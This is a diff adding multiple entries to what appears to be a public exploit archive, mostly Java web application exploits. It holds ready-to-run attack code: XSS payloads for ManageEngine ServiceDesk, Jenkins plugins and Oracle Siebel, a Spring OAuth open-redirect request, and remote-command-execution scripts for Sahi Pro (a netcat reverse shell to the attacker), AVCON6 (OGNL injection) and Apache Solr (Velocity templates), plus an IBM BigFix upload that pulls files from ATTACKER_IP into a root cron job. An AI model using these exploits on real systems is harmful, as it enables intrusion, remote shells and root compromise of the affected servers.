+    writeStream.close();
+    System.out.println("[+] Certificate deleted from keystore.");
+   }
+   else {
+    System.out.println("[-] Alias " + alias + " not found in keystore.");
+   }
+  }
+  catch (final Exception e) {
+   System.out.println("[-] Error occured while deleting certificate.");
+  }
+ }
+
+ private static class SavingTrustManager implements X509TrustManager {
+  private final X509TrustManager tm;
+  private X509Certificate[] chain;
+  SavingTrustManager(X509TrustManager tm) {
+   this.tm = tm;
+  }
+
+  @Override
+  public X509Certificate[] getAcceptedIssuers() {
+   return new X509Certificate[0];
+   // throw new UnsupportedOperationException();
+  }
+
+  @Override
+  public void checkClientTrusted(final X509Certificate[] chain,
+   final String authType)
+  throws CertificateException {
+   throw new UnsupportedOperationException();
+  }
+
+  @Override
+  public void checkServerTrusted(final X509Certificate[] chain,
+   final String authType)
+  throws CertificateException {
+   this.chain = chain;
+   this.tm.checkServerTrusted(chain, authType);
+  }
+ }
+}
\ No newline at end of file
diff --git a/exploits/java/webapps/46963.txt b/exploits/java/webapps/46963.txt
new file mode 100644
index 000000000..4e91540d1
--- /dev/null
+++ b/exploits/java/webapps/46963.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12538
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter
+
+
+Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=
+
+PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view
\ No newline at end of file
diff --git a/exploits/java/webapps/46964.txt b/exploits/java/webapps/46964.txt
new file mode 100644
index 000000000..b26cefbdb
--- /dev/null
+++ b/exploits/java/webapps/46964.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do 
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12541
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.
+
+
+Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions
+
+
+PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view
\ No newline at end of file
diff --git a/exploits/java/webapps/46965.txt b/exploits/java/webapps/46965.txt
new file mode 100644
index 000000000..48bc3279a
--- /dev/null
+++ b/exploits/java/webapps/46965.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12542
+
+
+An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.
+
+
+Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site
+
+PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
\ No newline at end of file
diff --git a/exploits/java/webapps/46966.txt b/exploits/java/webapps/46966.txt
new file mode 100644
index 000000000..1f2c33ff1
--- /dev/null
+++ b/exploits/java/webapps/46966.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12543
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.
+
+
+Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl
+
+
+PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
\ No newline at end of file
diff --git a/exploits/java/webapps/47000.txt b/exploits/java/webapps/47000.txt
new file mode 100644
index 000000000..8f70a8b43
--- /dev/null
+++ b/exploits/java/webapps/47000.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Open Redirector in spring-security-oauth2
+# Date: 17 June 2019
+# Exploit Author: Riemann
+# Vendor Homepage: https://spring.io/projects/spring-security-oauth
+# Software Link: https://spring.io
+# Version: Spring Security OAuth versions 2.3 prior to 2.3.6 -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
+# Tested on: UBUNTU 16.04 LTS -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
+# CVE : CVE-2019-11269 | CVE-2019-3778
+
+# Description
+Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.	
+
+
+#VULNERABILITY:
+By manipulating the REDIRECT_URI parameter, an attacker can actually bypass the validation.
+
+The code causing the vulnerability is found under the package org.springframework.security.oauth2.provider.endpoint
+The Class: DefaultRedirectResolver, which method obtainMatchingRedirect does not proper sanitation 
+
+/**
+	 * Attempt to match one of the registered URIs to the that of the requested one.
+	 * 
+	 * @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty.
+	 * @param requestedRedirect the URI used as part of the request
+	 * @return the matching URI
+	 * @throws RedirectMismatchException if no match was found
+	 */
+	private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) {
+		Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty");
+
+		if (redirectUris.size() == 1 && requestedRedirect == null) {
+			return redirectUris.iterator().next();
+		}
+		for (String redirectUri : redirectUris) {
+			if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) {
+				return requestedRedirect;
+			}
+		}
+		throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect
+				+ " does not match one of the registered values: " + redirectUris.toString());
+	}
+
+
+#POC ATTACK VECTOR
+The following request done by the CLIENT APP after the user has logged in, contains  the REDIRECT_URI parameter. The validation is bypassed by simply adding a percentage sign which triggers a redirect instead of the RedirectMismatchException error
+
+The ORIGINAL REQUEST containing a valid URI:
+GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1
+
+The attacker then tricks the application by changing entirely the URI to another server adding a percentage for example:
+
+GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1
+Host: localhost:8085
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8085/auth/login
+Connection: close
+Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63
+Upgrade-Insecure-Requests: 1
+
+
+The RESPONSE indeed does not produce an expected OAUTH error  but redirects the user :
+
+HTTP/1.1 302 
+Cache-Control: no-store
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: DENY
+Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D
+Content-Language: en-US
+Content-Length: 0
+Date: Mon, 17 Jun 2019 11:06:18 GMT
+Connection: close
\ No newline at end of file
diff --git a/exploits/java/webapps/47110.py b/exploits/java/webapps/47110.py
new file mode 100755
index 000000000..a01820f27
--- /dev/null
+++ b/exploits/java/webapps/47110.py
@@ -0,0 +1,92 @@
+# Exploit Title: Sahi Pro V8.0.0 - Unauthenticated Remote Command Execution
+# Date: 2019-07-12
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: https://sahipro.com
+# Software Link: https://sahipro.com/static/builds/pro/install_sahi_pro_v800_20181031.jar
+# Reference: https://pentest.com.tr/exploits/Sahi-Pro-v8-x-Unauthenticated-RCE-Exploit-Python.html
+# Version: 8.0.0
+# Category: Webapps
+# Tested on: Linux 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
+# Description: Sahi allows you to run ".sah" scripts by Sahi Launcher. Also you can create a new script with editor.
+# It is possible to execute commands on the server using the function "_execute()".
+# This exploit creates a new sahi script that runs "netcat" on the server and opens a shell session.
+# It can take 5-20 seconds to receive session.
+# ==================================================================
+# PoC:
+
+#!/usr/bin/python
+  
+import sys, requests
+import colorama, random, urllib
+from colorama import Fore
+ 
+def bannerche():
+    print '''
+ @-------------------------------------------------------------@
+ |       Sahi Pro v8.x - Unauthenticated RCE Exploit           |
+ |              Vulnerability discovered by AkkuS              |
+ |               My Blog - https://pentest.com.tr              |
+ @-------------------------------------------------------------@
+          '''
+bannerche()
+  
+def check_nc(rhost,lport):
+   choose = str(raw_input(Fore.RED + "+ [!] Do you listening "+rhost+" "+lport+" with netcat? (y/n): "))
+   if choose == "n":
+      return False
+   else:
+      return True
+
+def execute_command(rhost,rport,filename):
+   runuri = "http://"+rhost+":"+rport+"/_s_/sprm/_s_/dyn/Player_setScriptFile"
+   runheaders = {"Connection": "close"}
+   rundata = "dir=%2Froot%2Fsahi_pro%2Fuserdata%2Fscripts%2F&file="+filename+"&starturl=&manual=0"
+   runsah = requests.post(runuri, headers=runheaders, data=rundata)
+
+   if runsah.status_code == 200:    
+      print (Fore.GREEN + "+ [*] Script was executed. Please wait for the session...")
+   else:
+      print (Fore.RED + "+ [X] Failed to run script.")
+      sys.exit()
+
+def create_sah(rhost,rport,scdir,lhost,lport):
+ 
+   filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz0123456789') for i in range(7)) + ".sah"
+   payload = "_execute%28%27nc+"+lhost+"+"+lport+"+-e+%2Fbin%2Fbash%27%29%0A" # it depends I used netcat for PoC
+   sahuri = "http://"+rhost+":"+rport+"/_s_/dyn/pro/EditorUI_saveScript?"+urllib.urlencode({ 'dir' : scdir})+"&file="+filename+"&contents="+payload+""
+   saheaders = {"Connection": "close"}
+   sahreq = requests.get(sahuri, headers=saheaders)
+
+   if sahreq.status_code == 200:    
+      print (Fore.GREEN + "+ [*] "+filename+" script created successfully!")
+      execute_command(rhost,rport,filename)
+   else:
+      print (Fore.RED + "+ [X] Failed to create "+filename+" script.")
+      sys.exit()
+
+def main():
+
+   if (len(sys.argv) != 6):
+       print "[*] Usage: poc.py <RHOST> <RPORT> <SCDIR> <LHOST> <LPORT>"
+       print "[*] <RHOST> -> Target IP"
+       print "[*] <RPORT> -> Target Port"
+       print "[*] <SCDIR> -> Target Script Directory"
+       print "[*] <LHOST> -> Attacker IP"
+       print "[*] <LPORT> -> Attacker Port"
+       print "[*] Example: poc.py 192.168.1.2 9999 /root/sahi_pro/userdata/scripts/ 192.168.1.9 4444"
+       exit(0)
+  
+   rhost = sys.argv[1]
+   rport = sys.argv[2]
+   scdir = sys.argv[3]
+   lhost = sys.argv[4]
+   lport = sys.argv[5]
+
+   if not check_nc(rhost,rport):
+      print (Fore.RED + "+ [*] Please listen to the port required for the session and run exploit again!")
+   else:
+      create_sah(rhost,rport,scdir,lhost,lport)
+      
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/java/webapps/47111.txt b/exploits/java/webapps/47111.txt
new file mode 100644
index 000000000..0ad498026
--- /dev/null
+++ b/exploits/java/webapps/47111.txt
@@ -0,0 +1,39 @@
+# Exploit Title:  Persistent XSS - Dependency Graph View Plugin(v0.13)
+# Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# Platform: Java
+# CVE: CVE-2019-10349
+# Jenkins issue: #SECURITY-1177
+
+1. Description:
+The "Display Name" field in General Options of the Configure module in
+Jenkins was found to be accepting arbitrary value which when loaded in the
+Dependency Graph View module gets execute which makes it vulnerable to a
+Stored/Persistent XSS.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10349
+2. Proof of Concept:
+Vulnerable Source
+http://{jenkins-hostname:port}/jobs/{projectname}/configure
+Steps to Reproduce:
+Login to Jenkins Server with valid credentials and ensure that the
+dependency graph plugin is installed.
+1. Click on configure the Jenkins plugin.
+2. Select advanced options
+3. Enter the XSS payload in the "Display Name" field
+4. Navigate to Dependency Graph module
+5. Observe the Executed Payload
+6. Payload used for the demo:
+
+<img src="a" onerror="alert('jenkinsxss')">
+
+3. Solution:
+As of publication of this advisory, there is no fix.
+The plugin hsa been abandoned by the maintainer
+
+
+Reference
+https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1177
\ No newline at end of file
diff --git a/exploits/java/webapps/47379.py b/exploits/java/webapps/47379.py
new file mode 100755
index 000000000..f82332c1e
--- /dev/null
+++ b/exploits/java/webapps/47379.py
@@ -0,0 +1,59 @@
+# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
+# Date: 10/09/2018
+# Exploit Author: Nassim Asrir
+# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
+# CVE: N\A
+# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
+# Thanks to: Otmane Aarab
+# Example below:
+# python ./rce.py http://server:8080/ id 
+# Testing Target: http://server:8080/
+# uid=0(root) gid=0(root)
+# Vendor: http://www.epross.com/
+# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing 	
+# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
+# I am not responsible for any wrong use.
+######################################################################################################
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import httplib
+
+
+def exploit(url, cmd):
+    payload =  'login.action?redirect:'
+    payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
+    payload += 'start(),%23b%3d%23a.getInputStream(),'
+    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
+    payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
+    payload += '.read(%23e),%23matt%3d%23context.'
+    payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
+    payload += '%23matt.getWriter().println(%23e),%23matt.'
+    payload += 'getWriter().flush(),%23matt.getWriter()'
+    payload +=  '.close()}'
+
+  
+    try:
+        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
+        request = urllib2.Request(url+payload, headers=headers)
+        page = urllib2.urlopen(request).read()
+    except httplib.IncompleteRead, e:
+        page = e.partial
+
+    print(page)
+    return page
+
+
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) != 3:
+        print("[*] struts2_S2-045.py http://target/ id")
+    else:
+        print('[*] Avcon6-Preauh-Remote Command Execution')
+        url = sys.argv[1]
+        cmd = sys.argv[2]
+        print("[*] Executed Command: %s\n" % cmd)
+	print("[*] Target: %s\n" % url)
+        exploit(url, cmd)
\ No newline at end of file
diff --git a/exploits/java/webapps/47470.txt b/exploits/java/webapps/47470.txt
new file mode 100644
index 000000000..757247f6f
--- /dev/null
+++ b/exploits/java/webapps/47470.txt
@@ -0,0 +1,180 @@
+# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
+# Date: 2018-12-11
+# Exploit Authors: Jakub Palaczynski
+# Vendor Homepage: https://www.ibm.com/
+# Version: IBM Bigfix Platform <= 9.5.9.62
+# CVE: CVE-2019-4013
+
+
+Description:
+============
+
+Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges.
+
+What caused this issue:
+* path traversal - it is possible to escape from original directory and upload file to any other location
+* server running with root privileges - user can upload file to ANY location on the system
+* upload any type of file - application does not verify extension and MIME type of uploaded files
+* authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set
+* possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved.
+
+Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable.
+URL needs to point to attacker's web server where he hosts for example script files.
+When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user.
+
+An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron.
+Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script.
+
+
+Proof of Concept:
+=================
+
+cron.txt served on attacker's web server:
+* * * * * root bash /tmp/icmp.sh
+
+icmp.txt served on attacker's web server:
+#!/bin/bash
+ping -c 3 ATTACKER_IP
+
+
+Uploading cron task:
+POST /swd/api/packages/upload HTTP/1.1
+
+Host: XXX
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
+
+Content-Length: 846
+
+Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
+
+X-XSRF-TOKEN: XXX
+
+Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
+
+Connection: close
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="fileURL"
+
+
+
+http://ATTACKER_IP/cron.txt
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="username"
+
+
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="password"
+
+
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="urlFileName"
+
+
+
+../../../../../../../../etc/cron.d/task
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="urlDownloadAtRuntime"
+
+
+
+false
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="uploadId"
+
+
+
+user_1543410578364620
+
+-----------------------------7289782871626994727576601809--
+
+
+Uploading script file:
+POST /swd/api/packages/upload HTTP/1.1
+
+Host: XXX
+
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
+
+Content-Length: 846
+
+Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
+
+X-XSRF-TOKEN: XXX
+
+Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
+
+Connection: close
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="fileURL"
+
+
+
+http://ATTACKER_IP/icmp.txt
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="username"
+
+
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="password"
+
+
+
+
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="urlFileName"
+
+
+
+../../../../../../../../tmp/icmp.sh
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="urlDownloadAtRuntime"
+
+
+
+false
+
+-----------------------------7289782871626994727576601809
+
+Content-Disposition: form-data; name="uploadId"
+
+
+
+user_1543410578364620
+
+-----------------------------7289782871626994727576601809--
+
+
+After a while our script should be executed with root privileges.
\ No newline at end of file
diff --git a/exploits/java/webapps/47572.py b/exploits/java/webapps/47572.py
new file mode 100755
index 000000000..bc1990bc6
--- /dev/null
+++ b/exploits/java/webapps/47572.py
@@ -0,0 +1,195 @@
+# Title: Apache Solr 8.2.0 - Remote Code Execution
+# Date: 2019-11-01
+# Author: @l3x_wong
+# Vendor: https://lucene.apache.org/solr/
+# Software Link: https://lucene.apache.org/solr/downloads.html
+# CVE: N/A
+# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template
+
+# usage: python3 script.py ip [port [command]]
+#                default port=8983
+#                default command=whoami
+# note:
+# Step1: Init Apache Solr Configuration
+# Step2: Remote Exec in Every Solr Node
+
+import sys
+import json
+import time
+import requests
+
+
+class initSolr(object):
+
+    timestamp_s = str(time.time()).split('.')
+    timestamp = timestamp_s[0] + timestamp_s[1][0:-3]
+
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+
+    def get_nodes(self):
+        payload = {
+            '_': self.timestamp,
+            'indexInfo': 'false',
+            'wt': 'json'
+        }
+        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores'
+
+        try:
+            nodes_info = requests.get(url, params=payload, timeout=5)
+            node = list(nodes_info.json()['status'].keys())
+            state = 1
+        except:
+            node = ''
+            state = 0
+
+        if node:
+            return {
+                'node': node,
+                'state': state,
+                'msg': 'Get Nodes Successfully'
+            }
+        else:
+            return {
+                'node': None,
+                'state': state,
+                'msg': 'Get Nodes Failed'
+            }
+
+    def get_system(self):
+        payload = {
+            '_': self.timestamp,
+            'wt': 'json'
+        }
+        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system'
+        try:
+            system_info = requests.get(url=url, params=payload, timeout=5)
+            os_name = system_info.json()['system']['name']
+            os_uname = system_info.json()['system']['uname']
+            os_version = system_info.json()['system']['version']
+            state = 1
+
+        except:
+            os_name = ''
+            os_uname = ''
+            os_version = ''
+            state = 0
+
+        return {
+            'system': {
+                'name': os_name,
+                'uname': os_uname,
+                'version': os_version,
+                'state': state
+            }
+        }
+
+
+class apacheSolrRCE(object):
+
+    def __init__(self, ip, port, node, command):
+        self.ip = ip
+        self.port = port
+        self.node = node
+        self.command = command
+        self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node
+
+    def init_node_config(self):
+        url = self.url + '/config'
+        payload = {
+            'update-queryresponsewriter': {
+                'startup': 'lazy',
+                'name': 'velocity',
+                'class': 'solr.VelocityResponseWriter',
+                'template.base.dir': '',
+                'solr.resource.loader.enabled': 'true',
+                'params.resource.loader.enabled': 'true'
+            }
+        }
+        try:
+            res = requests.post(url=url, data=json.dumps(payload), timeout=5)
+            if res.status_code == 200:
+                return {
+                    'init': 'Init node config successfully',
+                    'state': 1
+                }
+            else:
+                return {
+                    'init': 'Init node config failed',
+                    'state': 0
+                }
+        except:
+            return {
+                'init': 'Init node config failed',
+                'state': 0
+            }
+
+    def rce(self):
+        url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
+                          "%23set($x=%27%27)+"
+                          "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
+                          "%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
+                          "%23set($str=$x.class.forName(%27java.lang.String%27))+"
+                          "%23set($ex=$rt.getRuntime().exec(%27" + self.command +
+                          "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
+                          "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
+        try:
+            res = requests.get(url=url, timeout=5)
+            if res.status_code == 200:
+                try:
+                    if res.json()['responseHeader']['status'] == '0':
+                        return 'RCE failed @Apache Solr node %s\n' % self.node
+                    else:
+                        return 'RCE failed @Apache Solr node %s\n' % self.node
+                except:
+                    return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0'))
+
+            else:
+                return 'RCE failed @Apache Solr node %s\n' % self.node
+        except:
+            return 'RCE failed @Apache Solr node %s\n' % self.node
+
+
+def check(ip, port='8983', command='whoami'):
+    system = initSolr(ip=ip, port=port)
+    if system.get_nodes()['state'] == 0:
+        print('No Nodes Found. Remote Exec Failed!')
+    else:
+        nodes = system.get_nodes()['node']
+        systeminfo = system.get_system()
+        os_name = systeminfo['system']['name']
+        os_version = systeminfo['system']['version']
+        print('OS Realese: %s, OS Version: %s\nif remote exec failed, '
+              'you should change your command with right os platform\n' % (os_name, os_version))
+
+        for node in nodes:
+            res = apacheSolrRCE(ip=ip, port=port, node=node, command=command)
+            init_node_config = res.init_node_config()
+            if init_node_config['state'] == 1:
+                print('Init node %s Successfully, exec command=%s' % (node, command))
+                result = res.rce()
+                print(result)
+            else:
+                print('Init node %s Failed, Remote Exec Failed\n' % node)
+
+
+if __name__ == '__main__':
+    usage = ('python3 script.py ip [port [command]]\n '
+             '\t\tdefault port=8983\n '
+             '\t\tdefault command=whoami')
+
+    if len(sys.argv) == 4:
+        ip = sys.argv[1]
+        port = sys.argv[2]
+        command = sys.argv[3]
+        check(ip=ip, port=port, command=command)
+    elif len(sys.argv) == 3:
+        ip = sys.argv[1]
+        port = sys.argv[2]
+        check(ip=ip, port=port)
+    elif len(sys.argv) == 2:
+        ip = sys.argv[1]
+        check(ip=ip)
+    else:
+        print('Usage: %s:\n' % usage)
\ No newline at end of file
diff --git a/exploits/java/webapps/47598.py b/exploits/java/webapps/47598.py
new file mode 100755
index 000000000..8a0cc6815
--- /dev/null
+++ b/exploits/java/webapps/47598.py
@@ -0,0 +1,44 @@
+# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
+# Date: 2019-11-06
+# Exploit Author: vesche (Austin Jackson)
+# Vendor Homepage: https://plugins.jenkins.io/build-metrics
+# Version: Jenkins build-metrics plugin 1.3 and below
+# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
+# CVE: CVE-2019-10475
+# Write-up: https://github.com/vesche/CVE-2019-10475
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+
+VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''
+
+
+def get_parser():
+    parser = argparse.ArgumentParser(description='CVE-2019-10475')
+    parser.add_argument('-p', '--port', help='port', default=80, type=int)
+    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
+    parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
+    return parser
+
+
+def main():
+    parser = get_parser()
+    args = vars(parser.parse_args())
+    port = args['port']
+    domain = args['domain']
+    inject = args['inject']
+    if port == 80:
+        base_url = f'http://{domain}'
+    elif port == 443:
+        base_url = f'https://{domain}'
+    else:
+        base_url = f'http://{domain}:{port}'
+    build_url = VULN_URL.format(base_url=base_url, inject=inject)
+    print(build_url)
+    return 0
+
+
+if __name__ == '__main__':
+    sys.exit(main())
\ No newline at end of file
diff --git a/exploits/java/webapps/47762.txt b/exploits/java/webapps/47762.txt
new file mode 100644
index 000000000..abedcaabd
--- /dev/null
+++ b/exploits/java/webapps/47762.txt
@@ -0,0 +1,22 @@
+# Exploit Title : Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting
+# Exploit Author : omurugur
+# Software link: https://www.oracle.com/tr/applications/siebel/
+# Effective version : Oracle Siebel Sales 8.1
+# CVE: N/A
+
+# Examples Request;
+
+POST /salesADMIN_trk/start.swe HTTP/1.1
